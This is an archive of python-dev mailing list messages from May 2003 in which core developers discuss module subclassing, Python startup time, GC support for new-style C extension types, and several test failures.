On Fri, 2003-05-16 at 14:44, Barry Warsaw wrote:
> No, it's not, and in 2.3 you get an error (albeit a TypeError with a
> rather unhelpful message).  I guess the "fix" hasn't been backported.

I think we decided this wasn't a pure bugfix :-).  Some poor soul may
have code that relies on being able to subclass a module.

Jeremy




From fred@zope.com  Fri May 16 19:49:38 2003
From: fred@zope.com (Fred L. Drake, Jr.)
Date: Fri, 16 May 2003 14:49:38 -0400
Subject: [Python-Dev] a strange case
In-Reply-To: <16069.12220.217558.569689@grendel.zope.com>
References: <16069.12220.217558.569689@grendel.zope.com>
Message-ID: <16069.12994.728753.504190@grendel.zope.com>

I wrote:
 > Here's a strange case we just ran across, led along by a typo in an
 > import statement.  This is using the head of the 2.2.x maintenance
 > branch; I've not tested this against the trunk yet.

Ok, the trunk does a little better, but the error message is a little
confusing:

Python 2.3b1+ (#2, May 16 2003, 14:42:51)
[GCC 2.96 20000731 (Red Hat Linux 7.3 2.96-113)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> class Foo(os):
...   pass
...
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: function takes at most 2 arguments (3 given)
>>> class Foo(os, sys):
...   pass
...
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: function takes at most 2 arguments (3 given)



  -Fred

-- 
Fred L. Drake, Jr.  <fred at zope.com>
PythonLabs at Zope Corporation


From fdrake@acm.org  Fri May 16 19:56:47 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Fri, 16 May 2003 14:56:47 -0400
Subject: [Python-Dev] a strange case
In-Reply-To: <1053111000.456.111.camel@slothrop.zope.com>
References: <16069.12220.217558.569689@grendel.zope.com>
 <1053110679.2342.4.camel@barry>
 <1053111000.456.111.camel@slothrop.zope.com>
Message-ID: <16069.13423.156806.769779@grendel.zope.com>

Jeremy Hylton writes:
 > I think we decided this wasn't a pure bugfix :-).  Some poor soul may
 > have code that relies on being able to subclass a module.

I just played with one of these things; they're as vacuous as modules
can possibly be!  If anyone depends on this, they're insane.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From skip@pobox.com  Fri May 16 20:00:24 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 16 May 2003 14:00:24 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <3EC51B5C.2080307@lemburg.com>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com>
 <3EC51B5C.2080307@lemburg.com>
Message-ID: <16069.13640.892428.185711@montanaro.dyndns.org>

    mal> FWIW, I've removed the re usage from encodings/__init__.py.

    mal> Could you check whether this makes a difference in startup time
    mal> now?

Well...  Not really, but it's not your fault.  site.py imports
distutils.util which imports re.  It does a fair amount of regex compiling,
some at the module level, so deferring "import re" may take a couple minutes
of work.  Hang on...

Okay, now re isn't imported.  The only runtime difference between the two
sets of times below is encodings/__init__.py 1.18 vs 1.19.  Each set of
times is for this command:

    % time ./python.exe -c pass

Everything was already byte compiled.  The times reported were the best of
five.  I tried to quiet the system as much as possible.  Still, since the
amount of work being done is minimal, it's tough to get a good feel for any
differences.

    version 1.18 (w/ re)

    real    0m0.143s
    user    0m0.030s
    sys     0m0.060s

    version 1.19 (no re)

    real    0m0.142s
    user    0m0.040s
    sys     0m0.060s

Note the rather conspicuous lack of any difference.  The only modifications
to my Lib tree are these:

    M cgitb.py
    M warnings.py
    M distutils/util.py
    M encodings/__init__.py
    M test/test_bsddb185.py

I verified that site was imported from my Lib tree:

    % ./python.exe -v -c pass 2>&1 | egrep 'site'
    # /Users/skip/src/python/head/dist/src/build.opt/../Lib/site.pyc matches /Users/skip/src/python/head/dist/src/build.opt/../Lib/site.py
    import site # precompiled from /Users/skip/src/python/head/dist/src/build.opt/../Lib/site.pyc
    # cleanup[1] site

It would appear that the encodings stuff isn't getting imported on my
platform (Mac OS X):

    % ./python.exe -v -c pass 2>&1 | egrep 'encoding'
    %

Looking at site.py shows that the encodings package is only imported on
win32 and only if the codecs.lookup() call fails.  Oh well, we don't care
about minority platforms. ;-) More seriously, to test your specific change
someone will have to run the check on Windows.

To contribute something maybe positive, here's the same timing comparison
using my changed version of distutils.util vs CVS:

    CVS:

    real    0m0.155s
    user    0m0.050s
    sys     0m0.070s

    Changed (no module-level re import):

    real    0m0.143s
    user    0m0.070s
    sys     0m0.040s

It appears eliminating "import re" has only a very small effect for me.  It
looks like an extra 6 modules are imported (25 vs 19).
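
The mechanics of the deferral are nothing special -- roughly this, shown
as a hypothetical module rather than the actual distutils code:

    _version_re = None

    def find_version(text):
        # "import re" moved from module level into the function, so merely
        # importing this module no longer drags in re/sre at startup.
        global _version_re
        if _version_re is None:
            import re
            _version_re = re.compile(r'\d+\.\d+')
        m = _version_re.search(text)
        return m and m.group(0)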

Skip


From barry@python.org  Fri May 16 20:09:31 2003
From: barry@python.org (Barry Warsaw)
Date: 16 May 2003 15:09:31 -0400
Subject: [Python-Dev] Startup time
In-Reply-To: <16069.13640.892428.185711@montanaro.dyndns.org>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com> <3EC51B5C.2080307@lemburg.com>
 <16069.13640.892428.185711@montanaro.dyndns.org>
Message-ID: <1053112171.2342.7.camel@barry>

On Fri, 2003-05-16 at 15:00, Skip Montanaro wrote:

> Well...  Not really, but it's not your fault.

Skip, you're going about this all wrong.  We already have the technology
to start Python up blazingly fast.  All you have to do <wink> is port
XEmacs's unexec code.  Then you load up Python with all the modules you
think you're going to need, unexec it, and the next time it starts up
like lightning.  Disk space is cheap!

-Barry




From jeremy@zope.com  Fri May 16 20:07:53 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 16 May 2003 15:07:53 -0400
Subject: [Python-Dev] Startup time
In-Reply-To: <16069.13640.892428.185711@montanaro.dyndns.org>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com> <3EC51B5C.2080307@lemburg.com>
 <16069.13640.892428.185711@montanaro.dyndns.org>
Message-ID: <1053112072.451.114.camel@slothrop.zope.com>

On Fri, 2003-05-16 at 15:00, Skip Montanaro wrote:
>     mal> FWIW, I've removed the re usage from encodings/__init__.py.
> 
>     mal> Could you check whether this makes a difference in startup time
>     mal> now?
> 
> Well...  Not really, but it's not your fault.  site.py imports
> distutils.util which imports re.  It does a fair amount of regex compiling,
> some at the module level, so deferring "import re" may take a couple minutes
> of work.  Hang on...

I don't think you need to do anything to distutils.  In the case we care
about (an installed Python) distutils.utils isn't imported.  Check this
code in site.py:

# Append ./build/lib.<platform> in case we're running in the build dir
# (especially for Guido :-)
# XXX This should not be part of site.py, since it is needed even when
# using the -S option for Python.  See http://www.python.org/sf/586680
if (os.name == "posix" and sys.path and
    os.path.basename(sys.path[-1]) == "Modules"):
    from distutils.util import get_platform
    s = "build/lib.%s-%.3s" % (get_platform(), sys.version)
    s = os.path.join(os.path.dirname(sys.path[-1]), s)
    sys.path.append(s)
    del get_platform, s

Jeremy




From amk@amk.ca  Fri May 16 20:09:51 2003
From: amk@amk.ca (A.M. Kuchling)
Date: Fri, 16 May 2003 15:09:51 -0400
Subject: [Python-Dev] Re: Startup time
In-Reply-To: <16069.13640.892428.185711@montanaro.dyndns.org>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>        <1052927757.7258.38.camel@slothrop.zope.com>        <3EC51B5C.2080307@lemburg.com> <16069.13640.892428.185711@montanaro.dyndns.org>
Message-ID: <ba3cun$1vk$1@main.gmane.org>

Skip Montanaro wrote:
> Well...  Not really, but it's not your fault.  site.py imports
> distutils.util which imports re.  

Note that this doesn't apply to an installed Python; that import is only 
done when running the interpreter from the build directory.

--amk




From skip@pobox.com  Fri May 16 20:16:09 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 16 May 2003 14:16:09 -0500
Subject: [Python-Dev] a strange case
In-Reply-To: <1053111000.456.111.camel@slothrop.zope.com>
References: <16069.12220.217558.569689@grendel.zope.com>
 <1053110679.2342.4.camel@barry>
 <1053111000.456.111.camel@slothrop.zope.com>
Message-ID: <16069.14585.371615.56117@montanaro.dyndns.org>

    Jeremy> On Fri, 2003-05-16 at 14:44, Barry Warsaw wrote:
    >> No, it's not, and in 2.3 you get an error (albeit a TypeError with a
    >> rather unhelpful message).  I guess the "fix" hasn't been backported.

    Jeremy> I think we decided this wasn't a pure bugfix :-).  Some poor
    Jeremy> soul may have code that relies on being able to subclass a
    Jeremy> module.

How about at least deprecating that feature in 2.2.3 and warning about it so
that poor soul knows this won't be supported forever?

Skip


From skip@pobox.com  Fri May 16 20:19:03 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 16 May 2003 14:19:03 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <1053112072.451.114.camel@slothrop.zope.com>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com>
 <3EC51B5C.2080307@lemburg.com>
 <16069.13640.892428.185711@montanaro.dyndns.org>
 <1053112072.451.114.camel@slothrop.zope.com>
Message-ID: <16069.14759.862301.686434@montanaro.dyndns.org>

    Jeremy> I don't think you need to do anything to distutils.  In the case
    Jeremy> we care about (an installed Python) distutils.utils isn't
    Jeremy> imported.  Check this code in site.py:

Ah, thanks.  That's the code I saw, but I didn't consider the preface
comment.

Skip


From tim@zope.com  Fri May 16 20:29:54 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 16 May 2003 15:29:54 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: <3EC507CB.6080502@zope.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHEEJJFLAA.tim@zope.com>

[Jim Fulton]
> ...
> I'll also note that most new-style types don't need and thus don't
> implement custom allocators. They leave the tp_alloc and tp_free slots
> empty.

I'm worried about half of that:  tp_free is needed to release memory no
matter whether obtained in a standard or custom way.  I don't think tp_free
slots always get filled in to something non-NULL by magic, and in the
current Python source almost all new-style C types explicitly define a
tp_free function (the exceptions are "strange" in some way).

PEP 253 may be partly out of date here -- or not.  In the section on
creating a subclassable type, it says:

"""
   The base type must do the following:

      - Add the flag value Py_TPFLAGS_BASETYPE to tp_flags.

      - Declare and use tp_new(), tp_alloc() and optional tp_init()
        slots.

      - Declare and use tp_dealloc() and tp_free().

      - Export its object structure declaration.

      - Export a subtyping-aware type-checking macro.
"""

This doesn't leave a choice about defining tp_alloc() or tp_free() -- it
says both are required.  For a subclassable type, I believe both must
actually be implemented too.

For a non-subclassable type, I expect they're optional.  But if you don't
define tp_free in that case, then I believe you must also not do the

    obj->ob_type->tp_free(obj)

business in the tp_dealloc slot (else it will segfault).



From jim@ZOPE.COM  Fri May 16 20:33:29 2003
From: jim@ZOPE.COM (Jim Fulton)
Date: Fri, 16 May 2003 15:33:29 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <1053106533.453.78.camel@slothrop.zope.com>
References: <3EC507CB.6080502@zope.com>	 <1053103323.456.71.camel@slothrop.zope.com>  <3EC51B12.8070407@zope.com> <1053106533.453.78.camel@slothrop.zope.com>
Message-ID: <3EC53D09.3050505@zope.com>

Jeremy Hylton wrote:
> On Fri, 2003-05-16 at 13:08, Jim Fulton wrote:
> 
>>If you write types the New Way, there are no PyObject_New calls and
>>no need to call PyObject_GC_Track.
> 
> 
> I don't follow.  There are plenty of types that are garbage collectable
> that also use PyObject_GC_New.  One example is PyDict_New().  If
> something is widespread in the Python source tree (a common source of
> example code for programmers), it ought to be documented.

It is documented in the API reference. Perhaps the API reference
should explain that there's a preferred way to do things.

There should be one preferred way to write types. It just happens that
that way is a *new* way and most existing types don't follow that way.

In the how-to style manual, we should only document the one preferred
way to write new types.  We shouldn't describe all of the various
obsolete variations.

It's unfortunate that there aren't many examples of how to do things
the new way, although that's understandable, since the new way wasn't
documented until recently.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org



From skip@pobox.com  Fri May 16 20:32:40 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 16 May 2003 14:32:40 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <1053112171.2342.7.camel@barry>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com>
 <3EC51B5C.2080307@lemburg.com>
 <16069.13640.892428.185711@montanaro.dyndns.org>
 <1053112171.2342.7.camel@barry>
Message-ID: <16069.15576.807563.525662@montanaro.dyndns.org>

    Barry> We already have the technology to start Python up blazingly fast.
    Barry> All you have to do <wink> is port XEmacs's unexec code.  

So Barry, how far along are you on this?  We all know you're the XEmacs whiz
of the Python crowd. ;-)

DEFUN-ly, yr's,

Skip


From barry@python.org  Fri May 16 20:40:55 2003
From: barry@python.org (Barry Warsaw)
Date: 16 May 2003 15:40:55 -0400
Subject: [Python-Dev] Startup time
In-Reply-To: <16069.15576.807563.525662@montanaro.dyndns.org>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com> <3EC51B5C.2080307@lemburg.com>
 <16069.13640.892428.185711@montanaro.dyndns.org>
 <1053112171.2342.7.camel@barry>
 <16069.15576.807563.525662@montanaro.dyndns.org>
Message-ID: <1053114055.2342.10.camel@barry>

On Fri, 2003-05-16 at 15:32, Skip Montanaro wrote:
>     Barry> We already have the technology to start Python up blazingly fast.
>     Barry> All you have to do <wink> is port XEmacs's unexec code.  
> 
> So Barry, how far along are you on this?  We all know you're the XEmacs whiz
> of the Python crowd. ;-)

Well, it's actually working pretty well and I'm about to cvs com....

...oh!  The cat's just eaten it.  Sorry.

bad-kitty-ly y'rs,
-Barry




From jeremy@zope.com  Fri May 16 20:42:40 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 16 May 2003 15:42:40 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <3EC53D09.3050505@zope.com>
References: <3EC507CB.6080502@zope.com>
 <1053103323.456.71.camel@slothrop.zope.com>  <3EC51B12.8070407@zope.com>
 <1053106533.453.78.camel@slothrop.zope.com>  <3EC53D09.3050505@zope.com>
Message-ID: <1053114159.457.117.camel@slothrop.zope.com>

I'm willing to believe there is a new and better way, but I don't think
I know what it is.  How do we change this code, written using the old
PyObject_GC_New(), to do things the new way?

Jeremy

PyObject *
PyDict_New(void)
{
	register dictobject *mp;
	if (dummy == NULL) { /* Auto-initialize dummy */
		dummy = PyString_FromString("<dummy key>");
		if (dummy == NULL)
			return NULL;
#ifdef SHOW_CONVERSION_COUNTS
		Py_AtExit(show_counts);
#endif
	}
	mp = PyObject_GC_New(dictobject, &PyDict_Type);
	if (mp == NULL)
		return NULL;
	EMPTY_TO_MINSIZE(mp);
	mp->ma_lookup = lookdict_string;
#ifdef SHOW_CONVERSION_COUNTS
	++created;
#endif
	_PyObject_GC_TRACK(mp);
	return (PyObject *)mp;
}




From jim@zope.com  Fri May 16 21:22:53 2003
From: jim@zope.com (Jim Fulton)
Date: Fri, 16 May 2003 16:22:53 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHEEJJFLAA.tim@zope.com>
References: <3EC507CB.6080502@zope.com> <BIEJKCLHCIOIHAGOKOLHEEJJFLAA.tim@zope.com>
Message-ID: <3EC5489D.9070208@zope.com>

Tim Peters wrote:
> [Jim Fulton]
> 
>>...
>>I'll also note that most new-style types don't need and thus don't
>>implement custom allocators. They leave the tp_alloc and tp_free slots
>>empty.
> 
> 
> I'm worried about half of that:  tp_free is needed to release memory no
> matter whether obtained in a standard or custom way.  I don't think tp_free
> slots always get filled in to something non-NULL by magic, and in the
> current Python source almost all new-style C types explicitly define a
> tp_free function (the exceptions are "strange" in some way).
> 
> PEP 253 may be partly out of date here -- or not.  In the section on
> creating a subclassable type, it says:
> 
> """
>    The base type must do the following:
> 
>       - Add the flag value Py_TPFLAGS_BASETYPE to tp_flags.
> 
>       - Declare and use tp_new(), tp_alloc() and optional tp_init()
>         slots.
> 
>       - Declare and use tp_dealloc() and tp_free().
> 
>       - Export its object structure declaration.
> 
>       - Export a subtyping-aware type-checking macro.
> """
> 
> This doesn't leave a choice about defining tp_alloc() or tp_free() -- it
> says both are required.  For a subclassable type, I believe both must
> actually be implemented too.
> 
> For a non-subclassable type, I expect they're optional.  But if you don't
> define tp_free in that case, then I believe you must also not do the
> 
>     obj->ob_type->tp_free(obj)
> 
> business in the tp_dealloc slot (else it will segfault).

Hm, I didn't read the PEP, I just went by what Guido told me. :)

I was told that PyType_Ready fills in tp_alloc and tp_free with default values.

I updated the noddy example in the docs. In this example, I filled
in neither tp_alloc nor tp_free.  I tested the examples and verified that
they work.

I just added printf calls to verify that these slots are indeed null before the
call to PyType_Ready and non-null afterwards.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org



From jim@zope.com  Fri May 16 21:30:47 2003
From: jim@zope.com (Jim Fulton)
Date: Fri, 16 May 2003 16:30:47 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <1053114159.457.117.camel@slothrop.zope.com>
References: <3EC507CB.6080502@zope.com>	 <1053103323.456.71.camel@slothrop.zope.com>  <3EC51B12.8070407@zope.com>	 <1053106533.453.78.camel@slothrop.zope.com>  <3EC53D09.3050505@zope.com> <1053114159.457.117.camel@slothrop.zope.com>
Message-ID: <3EC54A77.7090106@zope.com>

Jeremy Hylton wrote:
> I'm willing to believe there is a new and better way, but I don't think
> I know what it is. 

You can read the documentation for it here:

http://www.python.org/dev/doc/devel/ext/defining-new-types.html

:)

 > How do we change this code, written using the old
> PyObject_GC_New() to do things the new way?
> 
> Jeremy
> 
> PyObject *
> PyDict_New(void)
> {
> 	register dictobject *mp;
> 	if (dummy == NULL) { /* Auto-initialize dummy */
> 		dummy = PyString_FromString("<dummy key>");
> 		if (dummy == NULL)
> 			return NULL;
> #ifdef SHOW_CONVERSION_COUNTS
> 		Py_AtExit(show_counts);
> #endif
> 	}
> 	mp = PyObject_GC_New(dictobject, &PyDict_Type);
> 	if (mp == NULL)
> 		return NULL;
> 	EMPTY_TO_MINSIZE(mp);
> 	mp->ma_lookup = lookdict_string;
> #ifdef SHOW_CONVERSION_COUNTS
> 	++created;
> #endif
> 	_PyObject_GC_TRACK(mp);
> 	return (PyObject *)mp;
> }

see dict_new in the same file.

The new way to create instances of types is to call the type.

I don't know why PyDict_New doesn't just call the dict type.
Maybe doing things in-line like this is just an optimization.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org



From jim@zope.com  Fri May 16 22:08:27 2003
From: jim@zope.com (Jim Fulton)
Date: Fri, 16 May 2003 17:08:27 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <3EC507CB.6080502@zope.com>
References: <3EC507CB.6080502@zope.com>
Message-ID: <3EC5534B.5000102@zope.com>

Jim Fulton wrote:
> Lately I've been re-learning how to write new types in C.  Things
> changed drastically (for the better) in 2.2. I've been updating the
> documentation on writing new types as I go:
> 
> http://www.python.org/dev/doc/devel/ext/defining-new-types.html
> 
> (I'm also updating modulator.)
> 
> I'm starting to try to figure out how to integrate support for GC.
> The current documentation in the section "Supporting the Cycle
> Collector" doesn't reflect new-style types and is, thus, out of date.
> 
> Frankly, I'm taking the approach that there is only One Way to create
> types in C, the new way, based on new-style types as now documented
> in the manual.
> 
> I'll also note that most new-style types don't need and thus don't
> implement custom allocators. They leave the tp_alloc and tp_free slots
> empty.
> 
> So given that we have a new style type, to add support for GC, we need
> to:
> 
> - Set the Py_TPFLAGS_HAVE_GC type flag,
> 
> - Provide implementations of tp_traverse and tp_clear, as described in
>   the section "Supporting the Cycle Collector" section of the docs.
> 
> - Call PyObject_GC_UnTrack at the beginning of the deallocator,
>   before decrefing any members.
> 
> I think that that is *all* we have to do.

It looks like the answer is "no". :)

I tried to write a type using this formula and segfaulted.
Looking at other types, I found that if I want to support GC and
am using the default allocator, which I get for free, I have to fill
the tp_free slot with PyObject_GC_Del (_PyObject_GC_Del if I want to
support Python 2.2 and 2.3).

I *think* this is all I have to do.
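
For concreteness, here is a minimal sketch of a gc-aware type along these
lines.  The type name and its single PyObject* member are invented for
illustration; this is not the noddy code from the docs.

#include "Python.h"

/* Illustrative type holding one PyObject* member that can form cycles. */
typedef struct {
    PyObject_HEAD
    PyObject *child;
} Noddy;

static int
Noddy_traverse(Noddy *self, visitproc visit, void *arg)
{
    if (self->child != NULL)
        return visit(self->child, arg);
    return 0;
}

static int
Noddy_clear(Noddy *self)
{
    Py_XDECREF(self->child);
    self->child = NULL;
    return 0;
}

static void
Noddy_dealloc(Noddy *self)
{
    PyObject_GC_UnTrack(self);                /* untrack before decrefing members */
    Noddy_clear(self);
    self->ob_type->tp_free((PyObject *)self);
}

/* In the static PyTypeObject:
 *   tp_dealloc  = (destructor)Noddy_dealloc
 *   tp_flags    = Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC
 *   tp_traverse = (traverseproc)Noddy_traverse
 *   tp_clear    = (inquiry)Noddy_clear
 *   tp_free     = PyObject_GC_Del   -- the slot that must not be left NULL
 * tp_alloc can stay 0; PyType_Ready() fills in the gc-aware default.
 */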

Jim


-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org




From tim@zope.com  Fri May 16 22:37:07 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 16 May 2003 17:37:07 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <3EC5489D.9070208@zope.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHAEKFFLAA.tim@zope.com>

[Jim Fulton]
> Hm, I didn't read the PEP, I just went by what Guido told me. :)

That's a good idea -- I think the PEP is out of date here.

> I was told that PyType_Ready fills in tp_alloc and tp_free with
> default values.

And I finally found the code that does that <wink>.

> I updated the noddy example in the docs. In this example, I filled
> in neither tp_alloc or tp_free.  I tested the examples and verified that
> they work.
>
> I just added printf calls to verify that these slots are indeed
> null before the call to PyType_Ready and non-null afterwards.

This is the scoop:  if your type does *not* define the tp_base or tp_bases
slot, then PyType_Ready() sets your type's tp_base slot to
&PyBaseObject_Type by magic (this is the C spelling of the type named
"object" in Python), and the tp_bases slot to (object,) by magic.

A whole pile of type slots are then inherited from whatever tp_bases points
to after that (which is the singleton PyBaseObject_Type if you didn't set
tp_base or tp_bases yourself).

The tp_alloc slot it inherits from object is PyType_GenericAlloc.

The tp_free slot it inherits from object is PyObject_Del.

This works, but as we both discovered later, it leads to a segfault if your
type participates in cyclic gc too:  your type *still* inherits a tp_free of
PyObject_Del from object then, but that's the wrong deallocation function
for gc'able objects.  However, the default tp_alloc is aware of gc, and does
the right thing either way.

Guido, would you be agreeable to making this magic even more magical?  It
seems to me that we can know whether the current type intends to participate
in cyclic gc, and give it a correct default tp_free value instead if so.
The hairier type_new() function already has this extra level of
Py_TPFLAGS_HAVE_GC-dependent magic for dynamically created types, setting
tp_free to PyObject_Del in one case and to PyObject_GC_Del in the other.
PyType_Ready() can supply a wrong deallocation function by default
("explicit is better than implicit" has no force when talking about
PyType_Ready() <wink>).



From tim@zope.com  Fri May 16 22:43:51 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 16 May 2003 17:43:51 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <3EC54A77.7090106@zope.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHKEKGFLAA.tim@zope.com>

[Jim Fulton]
> ...
> I don't know wht PyDict_New doesn't just call the dict type.
> Maybe doing things in-line like this is just an optimization.

All aspects of dict objects are indeed micro-optimized.  In the office,
Jeremy raised some darned good points about things in dictobject.c that
don't make good sense anymore, but I'll skip those here because they don't
relate to the topic at hand (in brief, "module initialization" for
dictobject.c is still hiding inside PyDict_New, but there's no guarantee
that *ever* gets called anymore).



From troy@gci.net  Fri May 16 22:45:25 2003
From: troy@gci.net (Troy Melhase)
Date: Fri, 16 May 2003 13:45:25 -0800
Subject: [Python-Dev] a strange case
In-Reply-To: <20030516202402.30333.72761.Mailman@mail.python.org>
References: <20030516202402.30333.72761.Mailman@mail.python.org>
Message-ID: <200305161345.25415.troy@gci.net>

>     Jeremy> I think we decided this wasn't a pure bugfix :-).  Some poor
>     Jeremy> soul may have code that relies on being able to subclass a
>     Jeremy> module.
>
> How about at least deprecating that feature in 2.2.3 and warning about it
> so that poor soul knows this won't be supported forever?

I think I'm knocking on the poor-house door.

Just last night, it occurred to me that modules could be made callable via 
subclassing.  "Why in the world would you want callable modules you ask?"  I 
don't have a real need, but I often see the line blurred between package, 
module, and class.  Witness:

	from Foo import Bar
        frob = Bar()

If Bar is initially a class and is later reimplemented as a module, client code 
must change to account for that.  If Bar is reimplemented as a callable 
module, clients remain unaffected.

I haven't any code that relies on subclassing the module type, but many times 
I've gone thru the cycle of coding a class then promoting it to a module as 
it becomes more complex.  I'm certainly not advocating that the module type 
be subclassable or not, but I did want to point out a possible legitimate need 
to derive from it.  Many apologies if I'm wasting space and time.

-troy 

Silly example:

troy@marchhare tmp $ cat foo.py
def op():
    print 'foo op'

def frob():
    print 'foo frob'

def __call__(a, b, c):
    print 'module foo called!', a, b, c

troy@marchhare tmp $ cat bar.py
class ModuleObject(type(__builtins__)):
    def __init__(self, amodule):
        self.amodule = amodule
        self.__name__ = amodule.__name__
        self.__file__ = amodule.__file__

    def __getattr__(self, attr):
        return getattr(self.amodule, attr)

    def __call__(self, *a, **b):
        return self.amodule.__call__(*a, **b)


import foo
foo = ModuleObject(foo)
foo(1,2,3)

troy@marchhare tmp $ python2.3 bar.py
module foo called! 1 2 3







From drifty@alum.berkeley.edu  Fri May 16 23:13:34 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Fri, 16 May 2003 15:13:34 -0700
Subject: [Python-Dev] test_urllibnet failing on Windows
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHIEJEFLAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHIEJEFLAA.tim@zope.com>
Message-ID: <3EC5628E.5060302@ocf.berkeley.edu>

Tim Peters wrote:
>>...
>>The docs for fdopen say nothing about this restriction.  Anyone mind if
>>I add to the docs a mention of this limitation?
> 
> 
> AFAICT, you only asked me, so I'll answer <wink>:

Joys of missing the "reply all" button.  I am cc'ing python-dev on this now.

>  I think this is better
> spelled out in the docs for socket.fileno().  What it says now:
> 
>     Return the socket's file descriptor (a small integer).  This is
>     useful with select.select().
> 
> is correct for Unix, but on Windows it does not return a file descriptor (it
> returns a Windows socket handle, which is also "a small integer", and is
> also useful select.select() -- although on both Windows and Unix,
> select.select() extracts the fileno() from socket objects automatically, so
> there's no *need* to invoke fileno() explicitly in order to call select()).
> 

OK.  I will fix those docs.

-Brett



From drifty@alum.berkeley.edu  Sat May 17 00:25:02 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Fri, 16 May 2003 16:25:02 -0700
Subject: [Python-Dev] test_bsddb185 failing under OS X
Message-ID: <3EC5734E.30209@ocf.berkeley.edu>

======================================================================
FAIL: test_anydbm_create (__main__.Bsddb185Tests)
----------------------------------------------------------------------
Traceback (most recent call last):
   File "test_bsddb185.py", line 35, in test_anydbm_create
     self.assertNotEqual(ftype, "bsddb185")
   File "/Users/drifty/cvs_code/lib/python2.3/unittest.py", line 300, in 
failIfEqual
     raise self.failureException, \
AssertionError: 'bsddb185' == 'bsddb185'


DBs are not my area of expertise so I don't know how to go about to 
attempt to fix this.

-Brett



From tismer@tismer.com  Sat May 17 00:52:20 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sat, 17 May 2003 01:52:20 +0200
Subject: [Python-Dev] Need advice, maybe support
Message-ID: <3EC579B4.9000303@tismer.com>

Hi Guido, all,

In the last months, I have made a great deal of progress with Stackless 3.0.
Finally, I was able to make much more of Python stackless
(which means, it does not use recursive interpreter calls) than
I could achieve with 1.0.

There is one drawback with this, and I need advice:
Compared to older Python versions, Py 2.2.2 and up uses
more indirection through C function pointers than ever.
This blocked my implementation of stackless versions, in
the first place.

Then the idea hit me like a blizzard:
Most problems simply vanish if I add another slot to the
PyMethodDef structure, which is NULL by default:
ml_meth_nr is a function pointer with the same semantics
as ml_meth, but it tries to perform its action without
doing a recursive call. It tries instead to push a frame
and to return Py_UnwindToken.
Doing this change made Stackless crystal clear and simple:
A C extension not aware of Stackless does what it does
all the time: call ml_meth.
Stackless aware C code (like my modified ceval.c code)
calls the ml_meth_nr slots, instead, which either defaults
to the ml_meth code, or has a special version which avoids
recursive interpreter calls.
I also added a tp_call_nr slot to typeobject, for similar
reasons.
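
For illustration only -- the struct name below is invented, and this is
not the stock CPython PyMethodDef -- the layout described above might
look roughly like:

#include "Python.h"

typedef struct {
    char        *ml_name;       /* the usual four PyMethodDef fields */
    PyCFunction  ml_meth;
    int          ml_flags;
    char        *ml_doc;
    PyCFunction  ml_meth_nr;    /* non-recursive variant; NULL (the
                                   default) means "just use ml_meth" */
} StacklessMethodDef;

A Stackless-aware caller (like the modified ceval.c) picks ml_meth_nr
when it is non-NULL and falls back to ml_meth otherwise; extensions
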